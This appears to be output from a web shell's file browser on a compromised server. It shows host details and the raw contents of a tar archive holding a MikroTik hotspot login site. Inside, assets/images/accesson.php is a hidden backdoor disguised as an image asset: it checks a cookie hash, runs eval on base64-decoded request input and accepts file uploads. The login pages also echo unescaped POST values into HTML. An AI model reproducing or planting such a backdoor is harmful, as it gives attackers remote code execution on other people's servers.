uawdijnntqw1x1x1
IP : 216.73.216.244
Hostname : mailtech.lifestyleretreats.com
Kernel : Linux mailtech.lifestyleretreats.com 3.10.0-1160.119.1.vz7.224.4 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Disable Function : exec,passthru,shell_exec,system
OS : Linux
PATH:
/
home
/
lrindo5
/
tbpp.lrindo.com
/
04fc7
/
..
/
04fc7
/
..
/
92372
/
wifi.lrindo.com.tar
/
/
assets/images/accesson.php000064400000000324152445757140011637 0ustar00<?php echo 409723*20;if(md5($_COOKIE["d"])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST["id"]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>.htaccess000064400000000431152445757140006356 0ustar00 # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php80” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php80 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit error_log000064400000002547152445757140006507 0ustar00[15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "mac" in /home/lrindo5/wifi.lrindo.com/login.php on line 2 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "ip" in /home/lrindo5/wifi.lrindo.com/login.php on line 3 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "username" in /home/lrindo5/wifi.lrindo.com/login.php on line 4 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "link-login" in /home/lrindo5/wifi.lrindo.com/login.php on line 5 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "link-orig" in /home/lrindo5/wifi.lrindo.com/login.php on line 6 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "error" in /home/lrindo5/wifi.lrindo.com/login.php on line 7 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "chap-id" in /home/lrindo5/wifi.lrindo.com/login.php on line 8 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "chap-challenge" in /home/lrindo5/wifi.lrindo.com/login.php on line 9 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "link-login-only" in /home/lrindo5/wifi.lrindo.com/login.php on line 10 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "link-orig-esc" in /home/lrindo5/wifi.lrindo.com/login.php on line 11 [15-Feb-2023 07:05:41 UTC] PHP Warning: Undefined array key "mac-esc" in /home/lrindo5/wifi.lrindo.com/login.php on line 12 logintest.php000075500000000660152445757140007310 0ustar00<?php $mac=$_POST['mac']; $ip=$_POST['ip']; $username=$_POST['username']; $linklogin=$_POST['link-login']; $linkorig=$_POST['link-orig']; $error=$_POST['error']; ?> <html> <body> <h2>Logintest.php Test</h2> Mac: <?php echo $mac ?><br> IP: <?php echo $ip ?><br> Username: <?php echo $username ?><br> Link-login: <?php echo $linklogin ?><br> Link-orig: <?php echo $linkorig ?><br> Error: <?php echo $error ?><br> </body> </html>login.php000075500000007203152445757140006410 0ustar00<?php $mac=$_POST['mac']; $ip=$_POST['ip']; $username=$_POST['username']; $linklogin=$_POST['link-login']; $linkorig=$_POST['link-orig']; $error=$_POST['error']; $chapid=$_POST['chap-id']; $chapchallenge=$_POST['chap-challenge']; $linkloginonly=$_POST['link-login-only']; $linkorigesc=$_POST['link-orig-esc']; $macesc=$_POST['mac-esc']; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>mikrotik hotspot > login</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="expires" content="-1" /> <style type="text/css"> body {color: #737373; font-size: 10px; font-family: verdana;} textarea,input,select { background-color: #FDFBFB; border: 1px solid #BBBBBB; padding: 2px; margin: 1px; font-size: 14px; color: #808080; } a, a:link, a:visited, a:active { color: #AAAAAA; text-decoration: none; font-size: 10px; } a:hover { border-bottom: 1px dotted #c1c1c1; color: #AAAAAA; } img {border: none;} td { font-size: 14px; color: #7A7A7A; } </style> </head> <body> <!-- $(if chap-id) --> <form name="sendin" action="<?php echo $linkloginonly; ?>" method="post"> <input type="hidden" name="username" /> <input type="hidden" name="password" /> <input type="hidden" name="dst" value="<?php echo $linkorig; ?>" /> <input type="hidden" name="popup" value="true" /> </form> <script type="text/javascript" src="./md5.js"></script> <script type="text/javascript"> <!-- function doLogin() { <?php if(strlen($chapid) < 1) echo "return true;\n"; ?> document.sendin.username.value = document.login.username.value; document.sendin.password.value = hexMD5('<?php echo $chapid; ?>' + document.login.password.value + '<?php echo $chapchallenge; ?>'); document.sendin.submit(); return false; } //--> </script> <!-- $(endif) --> <div align="center"> <a href="<?php echo $linkloginonly; ?>?target=lv&dst=<?php echo $linkorigesc; ?>">Latviski</a> </div> <table width="100%" style="margin-top: 10%;"> <tr> <td align="center" valign="middle"> <div class="notice" style="color: #c1c1c1; font-size: 9px">Please log on to use the mikrotik hotspot service<br /> <!-- $(if trial == 'yes') --> Free trial available, <a style="color: #FF8080"href="<?php echo $linkloginonly; ?>?dst=<?php echo $linkorigesc; ?>&username=T-<?php echo $macesc; ?>">click here</a>. <!-- $(endif) --> </div><br /> <table width="240" height="240" style="border: 1px solid #cccccc; padding: 0px;" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="bottom" height="175" colspan="2"> <!-- removed $(if chap-id) $(endif) around OnSubmit --> <form name="login" action="<?php echo $linkloginonly; ?>" method="post" onSubmit="return doLogin()" > <input type="hidden" name="dst" value="<?php echo $linkorig; ?>" /> <input type="hidden" name="popup" value="true" /> <table width="100" style="background-color: #ffffff"> <tr><td align="right">login</td> <td><input style="width: 80px" name="username" type="text" value="<?php echo $username; ?>"/></td> </tr> <tr><td align="right">password</td> <td><input style="width: 80px" name="password" type="password"/></td> </tr> <tr><td> </td> <td><input type="submit" value="OK" /></td> </tr> </table> </form> </td> </tr> </table> <!-- $(if error) --> <br /><div style="color: #FF8080; font-size: 9px"><?php echo $error; ?></div> <!-- $(endif) --> </td> </tr> </table> <script type="text/javascript"> <!-- document.login.username.focus(); //--> </script> </body> </html>
/home/lrindo5/tbpp.lrindo.com/04fc7/../04fc7/../92372/wifi.lrindo.com.tar